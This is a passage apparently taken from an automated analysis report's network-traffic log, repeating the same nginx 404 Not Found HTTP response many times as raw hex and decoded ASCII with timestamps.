69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 